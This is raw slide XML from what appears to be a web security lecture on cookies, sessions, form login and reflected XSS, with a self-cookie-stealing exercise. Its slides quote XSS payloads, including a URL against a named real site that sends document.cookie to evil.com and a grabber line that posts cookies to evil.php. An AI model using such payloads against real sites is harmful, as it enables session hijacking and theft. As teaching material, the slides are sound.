            <a:off x="457200" y="1295880"/>
            <a:ext cx="82292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HTTP is a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200" b="0" u="sng" strike="noStrike" spc="-1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:uFillTx/>
                <a:latin typeface="Cambria"/>
              </a:rPr>
              <a:t>stateless</a:t>
            </a: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 protocol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.</a:t>
            </a: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 </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="3200" spc="-1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Cambria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What does that mean</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200" b="0" strike="noStrike" spc="-1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Cambria"/>
              </a:rPr>
              <a:t>?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 </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="32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PlaceHolder 1"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="457200" y="3276720"/>
            <a:ext cx="8229240" cy="1981080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457200" indent="-457200">
              <a:spcBef>
                <a:spcPts val="641"/>
              </a:spcBef>
              <a:tabLst>
                <a:tab pos="0" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" kern="0" spc="-1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Cambria"/>
              </a:rPr>
              <a:t>Stateless protocol </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" kern="0" spc="-1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Cambria"/>
              </a:rPr>
              <a:t>means each request is executed independently. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" indent="-457200">
              <a:spcBef>
                <a:spcPts val="641"/>
              </a:spcBef>
              <a:tabLst>
                <a:tab pos="0" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" kern="0" spc="-1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Cambria"/>
              </a:rPr>
              <a:t>It has no knowledge of the requests that were executed before it. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" indent="-457200">
              <a:spcBef>
                <a:spcPts val="641"/>
              </a:spcBef>
              <a:tabLst>
                <a:tab pos="0" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" kern="0" spc="-1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Cambria"/>
              </a:rPr>
              <a:t>Once the transaction ends the connection between the browser and the server is also lost.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" kern="0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 bwMode="auto"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6038" rIns="0" bIns="46038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sz="3600" kern="0" dirty="0" smtClean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Cookies</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="3600" kern="0" dirty="0">
              <a:solidFill>
                <a:srgbClr val="169A48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747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2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In </a:t>
            </a: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order to introduce the notion of a session, web services uses cookies.  Sessions are identified by a unique cookie.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="674" name="Picture 1"/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="3429000" y="3352680"/>
            <a:ext cx="2437920" cy="24793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 txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto"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6038" rIns="0" bIns="46038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sz="3600" kern="0" dirty="0" smtClean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Cookies</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="3600" kern="0" dirty="0">
              <a:solidFill>
                <a:srgbClr val="169A48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82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2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500" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/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They are small text file stored on your computer </a:t>
            </a:r>
          </a:p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 smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Cambria"/>
              </a:rPr>
              <a:t>Used to remember information about the user</a:t>
            </a:r>
          </a:p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They are saved in name=value pairs </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="3200" b="0" strike="noStrike" spc="-1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Cambria"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="674" name="Picture 1"/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="3429000" y="3352680"/>
            <a:ext cx="2437920" cy="24793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 txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto"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6038" rIns="0" bIns="46038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sz="3600" kern="0" dirty="0" smtClean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What are Cookies?</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="3600" kern="0" dirty="0">
              <a:solidFill>
                <a:srgbClr val="169A48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67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Form Authentication &amp; Cookies</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="676" name="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240" cy="4754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500" lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/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latin typeface="Cambria"/>
              </a:rPr>
              <a:t>Enrollment:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="635040" lvl="1" indent="-2919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mbria"/>
              </a:rPr>
              <a:t>Site asks user to pick username and password</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="635040" lvl="1" indent="-2919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mbria"/>
              </a:rPr>
              <a:t>Site stores both in backend database</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="2800" b="0" strike="noStrike" spc="-1">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Cambria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latin typeface="Cambria"/>
              </a:rPr>
              <a:t>Authentication:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="635040" lvl="1" indent="-2919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mbria"/>
              </a:rPr>
              <a:t>Site asks user for login information</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="635040" lvl="1" indent="-2919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mbria"/>
              </a:rPr>
              <a:t>Checks against backend database</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="635040" lvl="1" indent="-2919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mbria"/>
              </a:rPr>
              <a:t>Sets user </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" b="0" strike="noStrike" spc="-1">
                <a:solidFill>
                  <a:srgbClr val="990000"/>
                </a:solidFill>
                <a:latin typeface="Cambria"/>
              </a:rPr>
              <a:t>cookie </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" b="0" strike="noStrike" spc="-1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Cambria"/>
              </a:rPr>
              <a:t>indicating successful login</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="2800" b="0" strike="noStrike" spc="-1">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Cambria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latin typeface="Cambria"/>
              </a:rPr>
              <a:t>Browser sends cookie on subsequent visits to indicate authenticated status</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="677" name="Rounded Rectangle 5"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="990720" y="2743200"/>
            <a:ext cx="7314840" cy="144756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Cambria"/>
              </a:rPr>
              <a:t>Stealing cookies allows you to hijack a session without knowing the password</a:t>
            </a:r>
            <a:endParaRPr lang="en-US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518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Sessions using cookies</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="679" name="Rectangle 4"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1219320" y="1905120"/>
            <a:ext cx="1447560" cy="4114440"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/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680" name="Rectangle 5"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6172200" y="1905120"/>
            <a:ext cx="1447560" cy="4114440"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/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681" name="Text Box 8"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6392160" y="1447920"/>
            <a:ext cx="100728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Cambria"/>
              </a:rPr>
              <a:t>Server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2" name="Text Box 9"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1325160" y="1447920"/>
            <a:ext cx="123588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Cambria"/>
              </a:rPr>
              <a:t>Browser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3" name="Line 10"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2637360" y="2286000"/>
            <a:ext cx="3534840" cy="228600"/>
          </a:xfrm>
          <a:prstGeom prst="line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4" name="Text Box 11"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="345000">
            <a:off x="3539880" y="1828080"/>
            <a:ext cx="190764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POST/login.cgi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5" name="Line 12"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2666880" y="4495680"/>
            <a:ext cx="3505320" cy="295200"/>
          </a:xfrm>
          <a:prstGeom prst="line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Line 13"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="2666880" y="3047760"/>
            <a:ext cx="3505320" cy="457200"/>
          </a:xfrm>
          <a:prstGeom prst="line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7" name="Line 14"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="2666880" y="5410080"/>
            <a:ext cx="3505320" cy="457200"/>
          </a:xfrm>
          <a:prstGeom prst="line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Text Box 15"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="21279000">
            <a:off x="2871000" y="2896200"/>
            <a:ext cx="311616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Set-cookie: authenticator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9" name="Text Box 16"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="404400">
            <a:off x="3154320" y="4036320"/>
            <a:ext cx="2612520" cy="852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1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GET…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2001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Cookie: authenticator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0" name="Text Box 17"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="21279000">
            <a:off x="3838680" y="5209560"/>
            <a:ext cx="122652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response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86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Picture 16" descr="Screen Shot 2012-07-02 at 4.08.21 PM.png"/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="5308560" y="1523880"/>
            <a:ext cx="3250800" cy="1015560"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="0">
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="692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Stealing Your Own Cookie</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="693" name="Rounded Rectangular Callout 15"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="762120" y="1523880"/>
            <a:ext cx="4114440" cy="1218960"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRoundRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val 64783"/>
              <a:gd name="adj2" fmla="val -17332"/>
              <a:gd name="adj3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&lt;script&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400"/>
              <a:t/>
            </a:r>
            <a:br>
              <a:rPr sz="2400"/>
            </a:b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alert(document.cookie)</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400"/>
              <a:t/>
            </a:r>
            <a:br>
              <a:rPr sz="2400"/>
            </a:b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&lt;/script&gt;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694" name="Picture 2" descr="Screen Shot 2012-07-02 at 4.10.58 PM.png"/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2171880" y="3497040"/>
            <a:ext cx="6273360" cy="2945880"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="0">
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="695" name="Rounded Rectangular Callout 12"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="70200" y="4800600"/>
            <a:ext cx="3318120" cy="837720"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRoundRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val 72438"/>
              <a:gd name="adj2" fmla="val 26005"/>
              <a:gd name="adj3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My session token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79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of Cookie </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Grabber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the application doesn’t validate the input data, the attacker can easily steal a cookie from an authenticated user. </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>All needed is posted </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>input(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>ie</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>: message boards, private messages, user profiles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more information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https://owasp.org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Open </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Worldwide Application Security </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Project </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>(OWASP)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19271"/>
            <a:ext cx="8534400" cy="1200329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adr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> = '../</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>evil.php?cakemonster</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>=' + escape(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>document.cookie</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>);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617575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4"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="876240" y="1828800"/>
            <a:ext cx="7391160" cy="152352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/>
            <a:r>
              <a:rPr lang="en-US" sz="2800" b="0" strike="noStrike" spc="-1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Cambria"/>
              </a:rPr>
              <a:t>I want you to steal your own cookies. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" spc="-1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Cambria"/>
              </a:rPr>
              <a:t>You don’t need to report anything to me. </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2800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 dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Cambria"/>
              </a:rPr>
              <a:t> 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7" name="Rounded Rectangle 5"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1635840" y="3581280"/>
            <a:ext cx="5943240" cy="914040"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj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mbria"/>
              </a:rPr>
              <a:t>Just the feeling!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74994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Content</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0">
              <a:latin typeface="+mj-lt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 sz="2800" b="1" dirty="0" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill>
              <a:latin typeface="+mj-lt"/>
              <a:ea typeface="宋体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charset="-122"/>
              </a:rPr>
              <a:t>Cross Site Scripting (XSS)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Injection Attacks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Cross Site Request Forgery (CSRF)</a:t>
            </a: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Multi-Party Web Applications</a:t>
            </a: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Web Security Issues</a:t>
            </a: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Continue assignment…</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="37893" name="Picture 5" descr="&#10;prodsec04.jpg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66875" cy="17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7173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“Reflected” XSS</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="697" name="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240" cy="4754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spc="-1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Cambria"/>
              </a:rPr>
              <a:t>Reflected XSS attacks, also known as </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200" spc="-1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Cambria"/>
              </a:rPr>
              <a:t>non-persistent</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200" spc="-1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Cambria"/>
              </a:rPr>
              <a:t> attacks, occur when a malicious script is reflected off of a web application to the victim's browser. </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="3200" spc="-1" dirty="0" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Cambria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spc="-1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Cambria"/>
              </a:rPr>
              <a:t>The </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200" spc="-1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Cambria"/>
              </a:rPr>
              <a:t>script is activated through a link, which sends a request to a website with a vulnerability that enables execution of malicious scripts</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200" spc="-1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Cambria"/>
              </a:rPr>
              <a:t>.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="32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698" name="TextBox 4"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9429840" y="3429000"/>
            <a:ext cx="36162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Not clear to students</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1800"/>
              <a:t/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how a real attack would work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07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“Reflected” XSS</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="697" name="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240" cy="4754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Problem: </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3200" dirty="0"/>
              <a:t/>
            </a:r>
            <a:br>
              <a:rPr sz="3200" dirty="0"/>
            </a:b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Server reflects back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mbria"/>
              </a:rPr>
              <a:t>javascript</a:t>
            </a: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-laced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input</a:t>
            </a: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Cambria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Attack delivery method: </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3200" dirty="0"/>
              <a:t/>
            </a:r>
            <a:br>
              <a:rPr sz="3200" dirty="0"/>
            </a:b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Send victims a link containing XSS attack</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="698" name="TextBox 4"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9429840" y="3429000"/>
            <a:ext cx="36162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Not clear to students</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1800"/>
              <a:t/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how a real attack would work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2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“Reflected” XSS</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="698" name="TextBox 4"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9429840" y="3429000"/>
            <a:ext cx="36162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Not clear to students</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1800"/>
              <a:t/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how a real attack would work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62069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Reflected Example</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="700" name="Picture 4" descr="Picture 1.png"/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="-53640" y="1117080"/>
            <a:ext cx="9251280" cy="4140360"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="0">
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="701" name="TextBox 5"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1800" y="5230080"/>
            <a:ext cx="9140040" cy="101196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Up through 2009: </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1800"/>
              <a:t/>
            </a:r>
            <a:br>
              <a:rPr sz="1800"/>
            </a:b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http://www.lapdonline.org/... search_terms=&lt;script&gt;alert(“vuln”);&lt;/script&gt;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(example attack: send phish purporting link offers free Anti-virus)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767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Picture 8" descr="Picture 1.png"/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:srcRect l="-2" r="2879" b="11202"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="3809880" y="1170360"/>
            <a:ext cx="5146560" cy="2105640"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="0">
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="703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Stealing Cookies</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="704" name="PlaceHolder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="4294967295"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="4495680"/>
            <a:ext cx="8229240" cy="1858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 lnSpcReduction="20000"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mbria"/>
              </a:rPr>
              <a:t>http://www.lapdonline.org/search_results/search/&amp;view_all=1&amp;chg_filter=1&amp;searchType=content_basic&amp;</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3200"/>
              <a:t/>
            </a:r>
            <a:br>
              <a:rPr sz="3200"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="3200" b="0" strike="noStrike" spc="-1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Cambria"/>
              </a:rPr>
              <a:t>search_terms=%3Cscript%3Ealert(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200" b="0" u="sng" strike="noStrike" spc="-1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:uFillTx/>
                <a:latin typeface="Cambria"/>
              </a:rPr>
              <a:t>document.cookie</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200" b="0" strike="noStrike" spc="-1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Cambria"/>
              </a:rPr>
              <a:t>);%3C/script%3E</a:t>
            </a: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05" name="Rounded Rectangular Callout 7"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="228600" y="1523880"/>
            <a:ext cx="4114440" cy="1218960"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRoundRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val 59513"/>
              <a:gd name="adj2" fmla="val -51635"/>
              <a:gd name="adj3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&lt;script&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400"/>
              <a:t/>
            </a:r>
            <a:br>
              <a:rPr sz="2400"/>
            </a:b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alert(document.cookie)</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400"/>
              <a:t/>
            </a:r>
            <a:br>
              <a:rPr sz="2400"/>
            </a:b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&lt;/script&gt;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06" name="Rounded Rectangle 4"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1638360" y="3657600"/>
            <a:ext cx="5866920" cy="60912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Cambria"/>
              </a:rPr>
              <a:t>Phish with malicious URL</a:t>
            </a:r>
            <a:endParaRPr lang="en-US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241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TextBox 5"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2561760" y="323280"/>
            <a:ext cx="3733560" cy="2105280"/>
          </a:xfrm>
          <a:prstGeom prst="downArrowCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val 15543"/>
              <a:gd name="adj2" fmla="val 17569"/>
              <a:gd name="adj3" fmla="val 25000"/>
              <a:gd name="adj4" fmla="val 6497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Cambria"/>
              </a:rPr>
              <a:t>http://www.lapdonline.org/search_results/search/&amp;view_all=1&amp;chg_filter=1&amp;searchType=content_basic&amp;search_terms=%3Cscript%3Edocument.location=‘evil.com/’ +</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="0" u="sng" strike="noStrike" spc="-1">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:uFillTx/>
                <a:latin typeface="Cambria"/>
              </a:rPr>
              <a:t>document.cookie</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="0" strike="noStrike" spc="-1">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Cambria"/>
              </a:rPr>
              <a:t>;%3C/script%3E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200" b="0" strike="noStrike" spc="-1">
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="708" name="Picture 6"/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="5638680" y="4538880"/>
            <a:ext cx="1239840" cy="1785240"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="0">
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="709" name="Picture 7"/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1258560" y="1525320"/>
            <a:ext cx="1905120" cy="1108800"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="0">
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
